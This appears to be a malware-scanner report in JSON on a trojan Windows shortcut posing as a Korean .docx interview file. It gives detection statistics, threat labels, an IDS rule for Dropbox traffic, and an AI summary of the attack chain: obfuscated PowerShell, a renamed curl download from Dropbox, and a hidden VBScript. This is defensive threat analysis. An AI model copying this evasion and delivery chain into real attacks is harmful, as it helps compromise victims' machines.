"high": 5,
"medium": 8,
"low": 3
},
"last_analysis_stats": {
"malicious": 33,
"suspicious": 0,
"undetected": 23,
"harmless": 0,
"timeout": 5,
"confirmed-timeout": 0,
"failure": 2,
"type-unsupported": 12
},
"first_seen_itw_date": 1773830623,
"last_analysis_date": 1780648232,
"times_submitted": 1,
"names": [
"\uc911\uad6d CMG \uc778\ud130\ubdf0.docx.lnk",
"\u2534\u2580\u2592\u2563 CMG \u2514\u256c\u253c\u2550\u2551\u03a3.docx.lnk",
"?? CMG ???.docx.lnk"
],
"type_extension": "lnk",
"popular_threat_classification": {
"popular_threat_category": [
{
"value": "trojan",
"count": 19
},
{
"value": "downloader",
"count": 1
}
],
"suggested_threat_label": "trojan.pantera/powecod",
"popular_threat_name": [
{
"value": "pantera",
"count": 8
},
{
"value": "powecod",
"count": 3
},
{
"value": "lnkexec",
"count": 2
}
]
},
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 5,
"medium": 8,
"low": 3
}
},
"crowdsourced_ids_results": [
{
"rule_category": "Potential Corporate Privacy Violation",
"alert_severity": "info",
"rule_msg": "ET POLICY Dropbox.com Offsite File Backup in Use",
"rule_id": "1:2012647",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert tls [108.160.162.0/20,162.125.0.0/16,192.189.200.0/23,199.47.216.0/22,205.189.0.0/24,209.99.70.0/24,45.58.64.0/20] 443 -> $HOME_NET any (msg:\"ET POLICY Dropbox.com Offsite File Backup in Use\"; flow:established,to_client; tls.cert_subject; content:\"CN=*.dropbox.com\"; fast_pattern; threshold: type limit, count 1, seconds 300, track by_src; reference:url,www.dropbox.com; reference:url,dereknewton.com/2011/04/dropbox-authentication-static-host-ids/; classtype:policy-violation; sid:2012647; rev:7; metadata:created_at 2011_04_07, confidence High, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_03_25;)",
"rule_references": [
"https://www.dropbox.com",
"https://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/"
],
"alert_context": [
{
"src_ip": "162.125.3.18",
"src_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"b44baa8a20901c5663b3a9664ba8a767"
]
},
{
"src_ip": "162.125.70.18",
"src_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"b44baa8a20901c5663b3a9664ba8a767"
]
}
]
}
],
"filecondis": {
"dhash": "7074785040200040",
"raw_md5": "15f88d9723a8a417c55ef9d41507ef9f"
},
"tags": [
"lnk",
"long-sleeps",
"long-command-line-arguments",
"executes-dropped-file",
"hiding-window",
"high-entropy",
"self-delete",
"detect-debug-environment",
"large-file",
"url-pattern",
"abused-exe-pattern"
],
"last_modification_date": 1781278124,
"vhash": "9aa7b1b48e30aaaec993e88b4f95def7",
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"crowdsourced_ai_results": [
{
"category": "code_insight",
"source": "palm",
"verdict": "malicious",
"analysis": "The LNK file executes a complex, multi-stage attack chain using `cmd.exe`. The execution chain begins by using `cmd.exe` to find and execute PowerShell (`*rshell.exe`) with a heavily obfuscated payload. This payload uses a character-shifting algorithm (key=3) followed by Base64 decoding (`FromBase64String`) to reveal a secondary script block, characteristic of evasive techniques. Following the PowerShell execution, the command shell uses LOLBins: it copies `curl.exe` to a temporary name (`TMP0392.exe`) in the `%appdata%\\Microsoft\\MMC` directory. It then uses this temporary curl binary to download a file named `setting.ini` from a public Dropbox URL, saves it as `taskschd.vbs`, hides the downloaded file (`attrib +h`), and finally executes the VBScript file. The entire process involves encoded code execution, defense evasion (using LOLBins and file hiding), and downloading an external payload from a remote URL (Dropbox), leaving no doubt about its malicious intent.",
"id": "e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73-file-palm"
}
]
}
}
}